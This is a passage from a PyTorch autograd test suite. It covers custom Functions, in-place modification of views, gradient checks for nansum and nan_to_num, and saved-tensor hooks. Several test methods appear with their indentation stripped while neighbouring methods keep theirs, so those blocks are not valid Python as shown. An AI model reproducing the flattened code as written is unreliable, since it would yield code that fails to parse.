        run_test(grad_mode=False, requires_grad=False, is_view=True,
                 should_raise_tuple=(None, None, None))
    def test_inplace_not_requires_grad(self):
        """In-place writes of a grad-requiring tensor into views of a non-grad base:
        custom-Function views and multi-output views raise; plain views still work."""
        class MyFn(torch.autograd.Function):
            @staticmethod
            def forward(ctx, inp):
                return inp.view_as(inp)
            @staticmethod
            def backward(ctx, grad):
                return grad
        # Original Tensor does not require grad
        a = torch.rand(1, 2)
        # Tensor being written does require grad
        b = torch.rand(1, requires_grad=True)
        # Take an invalid view on 'a' that should raise an error (warns during deprecation)
        view_a = MyFn.apply(a)
        with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
            view_a += b
        # Extra test for copy_ that is a manual implementation and could be easily
        # forgotten when the codegen is updated (warns during deprecation)
        a = torch.rand(1, 2)
        b = torch.rand(1, requires_grad=True)
        view_a = MyFn.apply(a)
        with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
            view_a.copy_(b)
        # Functions that should throw must properly throw
        a = torch.rand(1, 2)
        b = torch.rand(1, requires_grad=True)
        view_a = a.unbind()[0]
        with self.assertRaisesRegex(RuntimeError, "This view is the output of a function that returns "
                                    "multiple views."):
            view_a.copy_(b)
        # Sanity check that views that should work still work
        a = torch.rand(1, 2)
        b = torch.rand(1, requires_grad=True)
        a.select(1, 0).copy_(b)
    def _do_test_autograd_simple_views_python(self, dtype):
        """Pin custom-Function behavior when an output is the input, a view of the
        input, or a view of a temporary, crossed with in-place modification.

        Args:
            dtype: element dtype for the test tensors (real or complex double).
        """
        # This is not necessarily the absolute correct behavior, but this is the current
        # one. This test is here to make sure that any change to this behavior is detected
        # and not silent. The TODOs below mark the places with unexpected behavior.
        # Note that any change in these test will be BC-breaking and should be done carefully.
        # This checks the autograd.Function behavior when we return one or multiple outputs
        # while one of these is an input, a view of an input or of a temporary tensor.
        # This indicator is used to track how many times the backward function was called
        bw_called = [0]
        # This indicator is used to check if the argument `ga` contains non-zero values
        ga_nz = [False]
        class IdOneOutput(Function):
            @staticmethod
            def forward(ctx, a, b, make_view):
                if make_view:
                    a = a.narrow(0, 0, 2)
                else:
                    a = a.clone()
                return a
            @staticmethod
            def backward(ctx, ga):
                bw_called[0] += 1
                return ga, None, None
        class IdTwoOutput(Function):
            @staticmethod
            def forward(ctx, a, b, make_view):
                if make_view:
                    a = a.narrow(0, 0, 2)
                else:
                    a = a.clone()
                return a, a + b
            @staticmethod
            def backward(ctx, ga, gab):
                bw_called[0] += 1
                if ga.eq(0).all():
                    ga_nz[0] = False
                else:
                    ga_nz[0] = True
                return ga + gab, gab, None
        class ViewOfTemp(Function):
            @staticmethod
            def forward(ctx, a, make_view):
                ctx.save_for_backward(a)
                if make_view:
                    a = a.narrow(0, 0, 2)
                else:
                    a = a.clone()
                b = a.clone()
                return b.select(0, 0)
            @staticmethod
            def backward(ctx, grad):
                bw_called[0] += 1
                a, = ctx.saved_tensors
                res = torch.zeros_like(a)
                res.select(0, 0).copy_(grad)
                return res, None
        fn_id_to_inplace_on_view_err_msg = {
            "one_output": ("Output 0 of IdOneOutputBackward is a view and is being "
                           "modified inplace. This view was created inside a custom Function"),
            "two_output": ("Output 0 of IdTwoOutputBackward is a view and is being modified inplace."
                           " This view is the output of a function that returns multiple views."),
            "view_of_temp": ("Output 0 of ViewOfTempBackward is a view and is being "
                             "modified inplace. This view was created inside a custom Function")
        }
        for fn_id in ["one_output", "two_output", "view_of_temp"]:
            for inplace in [True, False]:
                for make_view in [True, False]:
                    # Used for special casing the tests below
                    output_is_a_view = (make_view or fn_id == "view_of_temp")
                    def fn(a, b):
                        # never modify a, b inplace for gracheck
                        a = a.clone()
                        b = b.clone()
                        if fn_id == "two_output":
                            tmp1, tmp2 = IdTwoOutput.apply(a, b, make_view)
                            if inplace:
                                tmp1 += 3
                                tmp2 += 3
                            else:
                                tmp1 = tmp1 + 3
                                tmp2 = tmp2 + 3
                            tmp = tmp1 * tmp2
                        else:
                            if fn_id == "one_output":
                                tmp = IdOneOutput.apply(a, b, make_view)
                            else:
                                tmp = ViewOfTemp.apply(a + b, make_view)
                            if inplace:
                                tmp += 3
                            else:
                                tmp = tmp + 3
                        return tmp.sum()
                    a = torch.ones(2, dtype=dtype, requires_grad=True)
                    b = torch.ones(2, dtype=dtype, requires_grad=True)
                    err_msg = fn_id_to_inplace_on_view_err_msg[fn_id]
                    if not inplace or not output_is_a_view:
                        gradcheck(fn, (a, b), check_batched_grad=False)
                    # Was the custom backward called properly
                    bw_called[0] = 0
                    ga_nz[0] = True  # For the case where the backward is called
                    if inplace and output_is_a_view:
                        with self.assertRaisesRegex(RuntimeError, err_msg):
                            fn(a, b)
                    else:
                        fn(a, b).backward()
                    expected_called = 1
                    expected_ga_nz = True
                    if output_is_a_view and inplace:
                        expected_called = 0
                    self.assertTrue(bw_called[0] == expected_called)
                    self.assertTrue(ga_nz[0] == expected_ga_nz)
def test_autograd_simple_views_python(self):
self._do_test_autograd_simple_views_python(torch.double)
self._do_test_autograd_simple_views_python(torch.cdouble)
    def test_autograd_inplace_views_creation_meta(self):
        """Pin how a view's creation_meta (no_grad / multi-output / custom-Function
        origin) decides which in-place view ops and later in-place writes raise."""
        # Tests creation_meta properly handled for inplace views
        class Func(torch.autograd.Function):
            @staticmethod
            def forward(ctx, x):
                return x.view_as(x)
            @staticmethod
            def backward(ctx, x):
                return x
        view_custom = Func.apply
        def run_test(fn, fn_type, grad_mode_view, grad_mode_iview, requires_grad, error1, error2):
            # This test checks the behavior of inplace-view functions when
            # the views are created in grad mode or not
            base = torch.rand(2, 3, requires_grad=requires_grad).clone()
            # 1. Create a view with `grad_mode=grad_mode_view`
            with torch.set_grad_enabled(grad_mode_view):
                if fn_type == "multi_view":
                    inp = base.unbind()[0]
                elif fn_type == "custom" :
                    inp = view_custom(base)
                else:
                    inp = base.view_as(base)
            # 2. Perform inplace view with `grad_mode=grad_mode_iview`
            with torch.set_grad_enabled(grad_mode_iview):
                if error1 is not None:
                    with self.assertRaisesRegex(RuntimeError, error1):
                        fn(inp)
                    return
                else:
                    # If error is None, check that runs without error
                    fn(inp)
                # 3. Do inplace on the (new) view
                if error2 is not None:
                    with self.assertRaisesRegex(RuntimeError, error2):
                        inp.add_(1)
                else:
                    # If error is None, check that runs without error
                    inp.add_(1)
        no_grad_err = "A view was created in no_grad mode"
        multi_view_err = "function that returns multiple views"
        custom_err = "view was created inside a custom Function"
        def run_tests(fn):
            for fn_type in ("normal", "multi_view", "custom"):
                for grad_mode_view in (True, False):
                    for grad_mode_iview in (True, False):
                        for requires_grad in (True, False):
                            error1 = None  # expected error when we do inplace_view on original view
                            error2 = None  # expected error when we do inplace on the resulting view
                            if requires_grad:
                                if not grad_mode_view and grad_mode_iview:
                                    error1 = no_grad_err
                                if not grad_mode_view and not grad_mode_iview:
                                    error2 = no_grad_err
                                if fn_type == "multi_view":
                                    if grad_mode_view and grad_mode_iview:
                                        error1 = multi_view_err
                                    if grad_mode_view and not grad_mode_iview:
                                        error2 = multi_view_err
                                if fn_type == "custom":
                                    if grad_mode_view and grad_mode_iview:
                                        error1 = custom_err
                                    if grad_mode_view and not grad_mode_iview:
                                        error2 = custom_err
                            run_test(fn, fn_type, grad_mode_view, grad_mode_iview, requires_grad, error1, error2)
        # This list was created by logging gen_inplace_or_view_type.py
        # detach_ is excluded for this test because it cannot be applied to
        # views and thus does not return a view
        run_tests(lambda v: v.as_strided_((1, 0), (2, 2)))
        run_tests(lambda v: v.transpose_(0, 0))
        run_tests(lambda v: v.t_())
        run_tests(lambda v: v.squeeze_(0))
        run_tests(lambda v: v.unsqueeze_(0))
        run_tests(lambda v: v.swapdims_(0, 0))
        run_tests(lambda v: v.swapaxes_(0, 0))
    # TODO This is not the correct behavior -
    # See https://github.com/pytorch/pytorch/issues/49825#issuecomment-794466627
    def test_autograd_inplace_views_cross_dtype(self):
        """Pin the (known incorrect) gradient when transposing a view_as_real view
        in place: the grad comes back transposed vs. the out-of-place path."""
        # This test is here to make sure that any change to this behavior is detected
        # and not silent. The TODOs below mark the places with unexpected behavior.
        a_orig = torch.rand(3, 3, requires_grad=True, dtype=torch.complex64)
        a = a_orig.clone()
        b = torch.view_as_real(a)
        b = b.transpose(0, 1)
        b += 1
        b.backward(torch.arange(0, 18, dtype=torch.float).view(3, 3, 2))
        non_inplace_grad = a_orig.grad
        a_orig = torch.rand(3, 3, requires_grad=True, dtype=torch.complex64)
        a = a_orig.clone()
        b = torch.view_as_real(a)
        b.transpose_(0, 1)
        b += 1
        b.backward(torch.arange(0, 18, dtype=torch.float).view(3, 3, 2))
        inplace_grad = a_orig.grad
        # TODO: this is a bug!
        # once this is fixed, it should have the transpose removed:
        # self.assertTrue(torch.allclose(non_inplace_grad, inplace_grad))
        self.assertEqual(non_inplace_grad.T, inplace_grad)
    def test_autograd_multiple_views_python(self):
        """Pin how multiple views created inside one custom Function forward are
        traced, and that in-place on the returned view raises."""
        # This is not necessarily the absolute correct behavior, but this is the current
        # one. This test is here to make sure that any change to this behavior is detected
        # and not silent. The TODOs below mark the places with unexpected behavior.
        # Note that any change in these test will be BC-breaking and should be done carefully.
        # This checks that multiples views in the forward are properly traced and how they
        # behave with respect to inplace operations.
        # This indicator is used to track how many times the backward function was called
        bw_called = [0]
        class ComplexView(Function):
            @staticmethod
            def forward(ctx, a, idx):
                # NOTE(review): the narrow() result is immediately overwritten by the
                # select() below; presumably the extra view call is deliberate so the
                # forward creates more than one view of `a` — confirm.
                res = a.narrow(0, idx, 1)
                res = a.select(0, idx)
                ctx.save_for_backward(a)
                ctx.idx = idx
                return res
            @staticmethod
            def backward(ctx, grad):
                bw_called[0] += 1
                a, = ctx.saved_tensors
                res = torch.zeros_like(a)
                res.select(0, ctx.idx).copy_(grad)
                return res, None
        a = torch.ones(2, requires_grad=True)
        idx = 1
        bw_called[0] = 0
        out = ComplexView.apply(a.clone(), idx)
        out.sum().backward()
        self.assertTrue(bw_called[0] == 1)
        out = ComplexView.apply(a.clone(), idx)
        with self.assertRaisesRegex(RuntimeError,
                                    "Output 0 of ComplexViewBackward is a view and is being modified inplace"):
            out += 1
    def test_autograd_python_custom_function_inplace(self):
        """Pin current rules for custom Functions doing in-place work: mark_dirty on
        inputs vs. non-inputs, extra in-place on outputs, and view inputs."""
        # This is not necessarily the absolute correct behavior, but this is the current
        # one. This test is here to make sure that any change to this behavior is detected
        # and not silent. The TODOs below mark the places with unexpected behavior.
        # Note that any change in these test will be BC-breaking and should be done carefully.
        # This test checks custom autograd.Function that perform inplace operations
        bw_called = [0]
        # I) Single output
        class MyAdder(Function):
            @staticmethod
            def forward(ctx, a, b):
                a.add_(b)
                ctx.mark_dirty(a)
                return a
            @staticmethod
            def backward(ctx, grad):
                bw_called[0] += 1
                return grad, grad
        a = torch.ones(2, requires_grad=True)
        b = torch.ones(2, requires_grad=True)
        # No extra inplace
        c = MyAdder.apply(a.clone(), b)
        c.sum().backward()
        self.assertTrue(bw_called[0] == 1)
        # With extra inplace on the output
        bw_called[0] = 0
        c = MyAdder.apply(a.clone(), b)
        c += 2
        c.sum().backward()
        self.assertTrue(bw_called[0] == 1)
        # The input is a view
        bw_called[0] = 0
        c = MyAdder.apply(a.clone().view_as(a), b)
        c.sum().backward()
        self.assertTrue(bw_called[0] == 1)
        # Should not give non-inputs to mark_dirty
        class MyAdderBad(Function):
            @staticmethod
            def forward(ctx, a, b):
                c = 3 * a
                c.add_(b)
                ctx.mark_dirty(c)
                return c
            @staticmethod
            def backward(ctx, grad):
                bw_called[0] += 1
                grad = 3 * grad
                return grad, grad
        a = torch.ones(2, requires_grad=True)
        b = torch.ones(2, requires_grad=True)
        # Marking a non-input dirty only warns (deprecation), it does not raise yet
        with warnings.catch_warnings(record=True) as w:
            MyAdderBad.apply(a.clone(), b)
        self.assertEqual(len(w), 1)
        # II) Multiple outputs
        class MyBadAdder(Function):
            @staticmethod
            def forward(ctx, a, b):
                a.add_(b)
                ctx.mark_dirty(a)
                return a, a + b
            @staticmethod
            def backward(ctx, ga, gab):
                bw_called[0] += 1
                return ga + gab, ga + gab
        # No extra inplace
        bw_called[0] = 0
        c, d = MyBadAdder.apply(a.clone(), b)
        (c * d).sum().backward()
        self.assertTrue(bw_called[0] == 1)
        # With extra inplace on the output
        bw_called[0] = 0
        c, d = MyBadAdder.apply(a.clone(), b)
        c += 2
        (c * d).sum().backward()
        self.assertTrue(bw_called[0] == 1)
        # The input is a view
        inplace_on_view_err = "your Function modifies inplace an input that is a view of another Tensor"
        with self.assertRaisesRegex(RuntimeError, inplace_on_view_err):
            c, d = MyBadAdder.apply(a.clone().view_as(a), b)
        # III) Inplace + other op
        class MyOutPlaceAdder(Function):
            @staticmethod
            def forward(ctx, a, b):
                a.add_(b)
                ctx.mark_dirty(a)
                return a.clone(), a + b
            @staticmethod
            def backward(ctx, ga, gab):
                bw_called[0] += 1
                return ga + gab, ga + 2 * gab
        # We don't reuse the input
        def fn(a, b):
            orig_a = a.clone().view_as(a)
            c, d = MyOutPlaceAdder.apply(orig_a, b)
            return (c * d).sum()
        bad_mark_dirty_err = "Some elements marked as dirty during the forward method were not returned as output."
        with self.assertRaisesRegex(RuntimeError, bad_mark_dirty_err):
            fn(a, b)
def test_named_tensor_for_complex_views(self):
names = ["batch", "height", "width", "complex"]
z = torch.ones((5, 12, 14, 2), requires_grad=True)
z_named = z.refine_names(*names)
z_complex = torch.view_as_complex(z_named.rename(None)).refine_names(*names[:-1])
z_complex.sum().backward()
self.assertEqual(z.grad, torch.view_as_real(torch.ones_like(z_complex).rename(None)))
def test_custom_function_return_view_in_nograd(self):
class Alias(Function):
@staticmethod
def forward(ctx, x):
return x[:]
@staticmethod
def backward(ctx, gx):
return gx
inp = torch.rand(2, requires_grad=True)
with torch.no_grad():
output = Alias.apply(inp)
with torch.no_grad():
expected_output = inp[:]
# Calling the custom function should operate as if we called an equivalent op
self.assertEqual(output.requires_grad, expected_output.requires_grad)
# Check that in-place modification on view throws
leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, leaf_grad_err):
output.zero_()
    def test_grad_mode_restored_reentrant(self):
        """Grad mode toggled inside a reentrant backward (enable_grad within a custom
        backward) must be restored to its original value when the block exits."""
        class MyFunction(Function):
            @staticmethod
            def forward(ctx, inp):
                return inp.clone()
            @staticmethod
            def backward(ctx, go):
                original = torch._C.is_grad_enabled()
                with torch.enable_grad():
                    self.assertTrue(torch._C.is_grad_enabled())
                    foo = torch.rand(go.size(), requires_grad=True)
                    grad, = torch.autograd.grad(
                        foo ** 3, foo, grad_outputs=go
                    )
                    self.assertTrue(torch._C.is_grad_enabled())
                # Mode must be back to whatever it was before the enable_grad block
                self.assertTrue(torch._C.is_grad_enabled() == original)
                return grad
        inp = torch.rand(3, requires_grad=True)
        # Case where original==False
        MyFunction.apply(inp).sum().backward()
        # Case where original==True
        MyFunction.apply(inp).sum().backward(create_graph=True)
def test_power_function(self):
a = torch.tensor([0., 0., 0.])
b = torch.tensor([-1., 0., 1.], requires_grad=True)
c = torch.sum(a**b)
c.backward()
self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.]))
s = 0
b = torch.tensor([-1., 0., 1.], requires_grad=True)
c = torch.sum(s**b)
c.backward()
self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.]))
def test_nansum_with_nans(self):
a = torch.randn(2, 2, 2, 2, dtype=torch.double)
with torch.no_grad():
a[a < 0.2] = float('nan')
a.requires_grad = True
# No args
gradcheck(lambda x: x.nansum(), a)
gradgradcheck(lambda x: x.nansum(), a)
# Single dim
gradcheck(lambda x: x.nansum((0)), a)
gradgradcheck(lambda x: x.nansum((0)), a)
# Multi dim
gradcheck(lambda x: x.nansum((0, 2)), a)
gradgradcheck(lambda x: x.nansum((0, 2)), a)
gradcheck(lambda x: x.nansum((0, -1)), a)
gradgradcheck(lambda x: x.nansum((0, -1)), a)
# With keep-dim
gradcheck(lambda x: x.nansum((0, -1), True), a)
gradgradcheck(lambda x: x.nansum((0, -1), True), a)
def test_nansum_dtype(self):
inp = torch.randn(2, 2, 2, 2)
with torch.no_grad():
inp[inp < 0.2] = float('nan')
def test(inp, inp_dtype, out_dtype):
with torch.no_grad():
a = inp.to(inp_dtype)
a.requires_grad = True
b = torch.sum(a, dtype=out_dtype)
b.backward()
self.assertEqual(a.dtype, a.grad.dtype)
test(inp, torch.float, torch.double)
test(inp, torch.double, torch.float)
def test_nan_to_num(self):
a = torch.randn(3, 3, 3, 3, dtype=torch.double)
with torch.no_grad():
a[torch.rand_like(a) < 0.2] = float('nan')
a[torch.rand_like(a) < 0.2] = float('inf')
a[torch.rand_like(a) < 0.2] = -float('inf')
a.requires_grad = True
gradcheck(lambda x: x.nan_to_num(), a)
gradgradcheck(lambda x: x.nan_to_num(), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0, neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0, neginf=-2.0), a)
gradcheck(lambda x: x.nan_to_num(posinf=2.0, neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(posinf=2.0, neginf=-2.0), a)
gradcheck(lambda x: x.nan_to_num(neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(neginf=-2.0), a)
    def test_custom_function_error(self):
        """Custom Functions that are missing forward/backward, or that define both
        backward and vjp, must fail with clear error messages."""
        class BadFw(Function):
            @staticmethod
            def backward(ctx, foo):
                return foo
        class BadBw(Function):
            @staticmethod
            def forward(ctx, foo):
                return foo.clone()
        class BadBw2(Function):
            @staticmethod
            def forward(ctx, foo):
                return foo.clone()
            @staticmethod
            def backward(ctx, foo):
                return foo
            @staticmethod
            def vjp(ctx, foo):
                return foo
        inp = torch.rand(1, requires_grad=True)
        with self.assertRaisesRegex(NotImplementedError, "must implement the forward"):
            BadFw.apply(inp)
        with self.assertRaisesRegex(RuntimeError, "must implement either the backward"):
            BadBw.apply(inp).sum().backward()
        with self.assertRaisesRegex(RuntimeError, "Implementing both 'backward' and 'vjp'"):
            BadBw2.apply(inp).sum().backward()
def test_custom_function_local_inplace(self):
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, inp, inplace):
view = inp.clone()[:3]
if inplace:
view += 2
return view
@staticmethod
def backward(ctx, grad):
return grad, None
base = torch.rand(10, requires_grad=True)
foo = MyFn.apply(base, False)
self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward")
foo = MyFn.apply(base, True)
self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward")
    def test_integer_outputs(self):
        """Integer-valued outputs (argmax/argmin/argsort, searchsorted, bucketize,
        count_nonzero, the unique family) must never require grad."""
        inp = torch.rand(4, requires_grad=True)
        out = inp.argmax()
        self.assertFalse(out.dtype.is_floating_point)
        self.assertFalse(out.requires_grad)
        out = inp.argmin()
        self.assertFalse(out.dtype.is_floating_point)
        self.assertFalse(out.requires_grad)
        out = inp.argsort()
        self.assertFalse(out.dtype.is_floating_point)
        self.assertFalse(out.requires_grad)
        val = torch.rand((), requires_grad=True)
        out = torch.searchsorted(inp, val)
        self.assertFalse(out.dtype.is_floating_point)
        self.assertFalse(out.requires_grad)
        bins = torch.linspace(0, 1.0, steps=100, requires_grad=True)
        vals = torch.rand(5, 5, requires_grad=True)
        out = torch.bucketize(vals, bins)
        self.assertFalse(out.dtype.is_floating_point)
        self.assertFalse(out.requires_grad)
        val = torch.empty(5).requires_grad_()
        out = val.count_nonzero()
        self.assertFalse(out.requires_grad)
        def assert_only_first_requires_grad(res):
            # unique-family ops return (values, [inverse], [counts]); only values may require grad
            if not isinstance(res, tuple):
                res = (res,)
            self.assertTrue(res[0].requires_grad)
            for out in res[1:]:
                if out is not None:
                    self.assertFalse(out.requires_grad)
        for sort in [True, False]:
            for return_inverse in [True, False]:
                for return_counts in [True, False]:
                    res = torch.unique(inp, sorted=sort, return_inverse=return_inverse,
                                       return_counts=return_counts)
                    assert_only_first_requires_grad(res)
                    res = torch.unique(inp, sorted=sort, return_inverse=return_inverse,
                                       return_counts=return_counts, dim=0)
                    assert_only_first_requires_grad(res)
                    res = torch.unique_consecutive(inp, return_inverse=return_inverse,
                                                   return_counts=return_counts)
                    assert_only_first_requires_grad(res)
                    res = torch.unique_consecutive(inp, return_inverse=return_inverse,
                                                   return_counts=return_counts, dim=0)
                    assert_only_first_requires_grad(res)
                    # Here we test the internal functions to make sure all of them are
                    # covered on top of the public API
                    res = torch._unique(inp, sorted=sort, return_inverse=return_inverse)
                    assert_only_first_requires_grad(res)
                    # This looks public but is actually manually deleted from the
                    # torch namespace in torch/functional.py
                    res = torch._VF.unique_dim(inp, dim=0, sorted=sort, return_inverse=return_inverse,
                                               return_counts=return_counts)
                    assert_only_first_requires_grad(res)
                    # We don't test `unique_dim_consecutive` here.
                    # It looks public but the python binding is actually manually disabled in
                    # tools/autograd/gen_python_functions.py
                    res = torch._unique2(inp, sorted=sort, return_inverse=return_inverse,
                                         return_counts=return_counts)
                    assert_only_first_requires_grad(res)
    def test_custom_function_cycle(self):
        """A reference cycle through ctx (saved tensor <-> metadata dict holding the
        output) must be collectable by gc, both before and after backward runs."""
        class MyFn(Function):
            @staticmethod
            def forward(ctx, x, metadata):
                x = x.clone()
                ctx.meta = metadata
                ctx.save_for_backward(x)
                return x
            @staticmethod
            def backward(ctx, gO):
                x, = ctx.saved_tensors
                self.assertEqual(x, 3.14)
                self.assertEqual(ctx.meta["foo"], 3.14)
                return gO * x, None
        def get_refs(with_backward):
            a = torch.tensor(3.14, requires_grad=True)
            metadata = {}
            out = MyFn.apply(a, metadata)
            # Close the cycle: ctx.meta["foo"] -> out -> grad_fn -> ctx
            metadata["foo"] = out
            if with_backward:
                out.sum().backward()
                self.assertEqual(a.grad, a)
            return torch._C._WeakTensorRef(out)
        with disable_gc():
            ref = get_refs(False)
            self.assertFalse(ref.expired())
        gc.collect()
        self.assertTrue(ref.expired())
        # The backward clears the saved_variables but not the __dict__
        with disable_gc():
            ref = get_refs(True)
            self.assertFalse(ref.expired())
        gc.collect()
        self.assertTrue(ref.expired())
def test_input_buffer_accum(self):
leaf = torch.rand(2, 2, requires_grad=True)
# An op that returns sparse gradients
ind = torch.tensor([[0, 0]], dtype=torch.long)
out2 = leaf.gather(0, ind, sparse_grad=True)
# An op that returns the gradients as-is
out1 = leaf.clone()
grad_out1_original = torch.rand_like(out1)
grad_out1 = grad_out1_original.clone()
grad_out2 = torch.rand_like(out2)
torch.autograd.backward((out1, out2), (grad_out1, grad_out2))
# Given gradients should not be modified inplace
self.assertEqual(grad_out1, grad_out1_original)
    def test_no_unnecessary_unwrapping(self):
        """Saved inputs are stored by reference (same object), while saved outputs
        unpack to equal-but-distinct tensors; freed saves raise on access."""
        a = torch.randn(5, requires_grad=True)
        a_orig = a.detach().clone()
        b = a * a
        c = a * b
        d = torch.exp(a)
        # a is leaf
        self.assertIs(b.grad_fn._saved_self, a)
        self.assertIs(b.grad_fn._saved_other, a)
        self.assertIs(c.grad_fn._saved_self, a)
        # b is not an output
        self.assertIs(c.grad_fn._saved_other, b)
        # d is an output
        self.assertEqual(d.grad_fn._saved_result, d)
        self.assertIsNot(d.grad_fn._saved_result, d)
        c.sum().backward()
        with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
            c.grad_fn._saved_self
        # a is left untouched
        self.assertEqual(a, a_orig)
def test_saved_variable_version_counter(self):
a = torch.rand(2, requires_grad=True)
b = torch.exp(a)
b_unpacked = b.grad_fn._saved_result
self.assertEqual(b, b_unpacked)
self.assertEqual(b._version, b_unpacked._version)
with torch.no_grad():
b += 1
self.assertEqual(b, b_unpacked)
self.assertEqual(b._version, b_unpacked._version)
    def test_saved_variable_packing_unpacking_saved_original_with_hooks(self):
        """Per-SavedVariable hooks: pack/unpack round-trips (for leaf and non-leaf
        saves), error cases (non-Tensor unpack result, wrong hook arity, in-place
        pack), and double backward."""
        # Tests that packing/unpacking a SavedVariable works correctly with user-defined hooks
        # The saved_original / did_not_save_original distinction corresponds to the `save_original`
        # attribute of `SavedVariable`.
        def test(get_input, is_leaf):
            a = get_input()
            grad_fn = a.grad_fn
            y = a * a
            # Inverse pair of hooks: unpacking must give back the original value
            y.grad_fn._raw_saved_self.register_hooks(lambda x: 2 * x, lambda x: x / 2)
            self.assertEqual(a, y.grad_fn._saved_self)
            if not is_leaf:
                self.assertIs(grad_fn, y.grad_fn._saved_self.grad_fn)
                y.sum().backward()
            else:
                y.sum().backward()
                self.assertEqual(2 * a, a.grad)
            a = get_input()
            grad_fn = a.grad_fn
            y = a * a
            # Non-inverse hooks: the unpacked value (and hence the grad) is scaled
            y.grad_fn._raw_saved_self.register_hooks(lambda x: 2 * x, lambda x: x)
            self.assertEqual(2 * a, y.grad_fn._saved_self)
            if not is_leaf:
                self.assertIs(grad_fn, y.grad_fn._saved_self.grad_fn)
                y.sum().backward()
            else:
                y.sum().backward()
                self.assertEqual(3 * a, a.grad)
            # double backward
            a = get_input()
            grad_fn = a.grad_fn
            y = a ** 3
            y.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)
            s = torch.sum(y)
            g, = torch.autograd.grad(s, (a, ), create_graph=True)
            if not is_leaf:
                self.assertIs(grad_fn, y.grad_fn._saved_self.grad_fn)
                g.sum().backward()
            else:
                g.sum().backward()
                self.assertEqual(6 * a, a.grad)
            a = get_input()
            y = a * a
            # Unpack hook returning a non-Tensor is only detected at unpack time
            y.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: 1)
            with self.assertRaisesRegex(TypeError, "Output of saved tensor unpack_hook expected to be a Tensor"):
                print(y.grad_fn._saved_self)
            a = get_input()
            y = a * a
            with self.assertRaisesRegex(TypeError, "missing 1 required positional argument"):
                y.grad_fn._raw_saved_self.register_hooks(lambda x, b: x, lambda x: x)
            a = get_input()
            y = a * a
            with self.assertRaisesRegex(TypeError, "missing 1 required positional argument"):
                y.grad_fn._raw_saved_self.register_hooks(lambda x, b: (x, b), lambda x: x)
            def inplace_double(x):
                x *= 2
                return x
            a = get_input()
            t = a * a
            with self.assertRaisesRegex(RuntimeError, "A saved tensor pack hook is modifying its input in place."):
                t.grad_fn._raw_saved_self.register_hooks(inplace_double, lambda x: x / 2)
        # leaf
        test(lambda: torch.randn(5, requires_grad=True), True)
        # not leaf, not output
        test(lambda: (1 + torch.randn(5, requires_grad=True)), False)
def test_saved_variable_packing_unpacking_did_not_save_original_with_hooks(self):
# Tests that packing/unpacking a SavedVariable works correctly with user-defined hooks
# The saved_original / did_not_save_original distinction corresponds to the `save_original`
# attribute of `SavedVariable`.
a = torch.randn(5, requires_grad=True)
y = torch.exp(a)
y.grad_fn._raw_saved_result.register_hooks(lambda x: x, lambda x: x)
self.assertEqual(y, y.grad_fn._saved_result)
self.assertIs(y.grad_fn, y.grad_fn._saved_result.grad_fn)
y.sum().backward()
self.assertEqual(a.grad, y)
    def test_saved_variable_packing_unpacking_saved_original_with_default_hooks(self):
        """Default saved-tensors hooks are applied to every save (twice for a*a),
        affect gradients when not inverse of each other, and are unwound on exit."""
        # Tests that default hooks are properly registered, used and reset
        # The saved_original / did_not_save_original distinction corresponds to the `save_original`
        # attribute of `SavedVariable`.
        # See also:
        # - test_saved_variable_packing_unpacking_saved_original_with_hooks
        def pack(x):
            warnings.warn("pack")
            return x
        with torch.autograd.graph.saved_tensors_hooks(pack, lambda x: x):
            a = torch.ones(5, requires_grad=True)
            warnings.simplefilter('always')
            with warnings.catch_warnings(record=True) as w:
                y = a * a
                # should raise two warnings from a being saved twice
                self.assertEqual(len(w), 2)
        with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
            a = torch.randn(5, requires_grad=True)
            y = a * a
            self.assertEqual(a, y.grad_fn._saved_self)
            self.assertEqual(a, y.grad_fn._saved_other)
            y.sum().backward()
            self.assertEqual(2 * a, a.grad)
        # Inverse hook pair: values and gradients are unaffected
        with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x / 2):
            a = torch.randn(5, requires_grad=True)
            y = a * a
            self.assertEqual(a, y.grad_fn._saved_self)
            self.assertEqual(a, y.grad_fn._saved_other)
            y.sum().backward()
            self.assertEqual(2 * a, a.grad)
        # Non-inverse hooks: the unpacked saves (and hence the grad) are doubled
        with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x):
            a = torch.randn(5, requires_grad=True)
            y = a * a
            self.assertEqual(2 * a, y.grad_fn._saved_self)
            self.assertEqual(2 * a, y.grad_fn._saved_other)
            y.sum().backward()
            self.assertEqual(4 * a, a.grad)
        # Exited hooks correctly
        a = torch.randn(5, requires_grad=True)
        y = a * a
        self.assertEqual(a, y.grad_fn._saved_self)
        self.assertEqual(a, y.grad_fn._saved_other)
        y.sum().backward()
        self.assertEqual(2 * a, a.grad)
def test_saved_variable_packing_unpacking_did_not_save_original_with_default_hooks(self):
# See also test_saved_variable_packing_unpacking_did_not_save_original_with_hooks
with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
a = torch.randn(5, requires_grad=True)
y = torch.exp(a)
self.assertEqual(y, y.grad_fn._saved_result)
y.sum().backward()
self.assertEqual(a.grad, y)
def test_setting_default_saved_variable_hooks_twice_should_fail(self):
with self.assertRaisesRegex(RuntimeError, "Setting default hooks but they have already been set. "):
with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
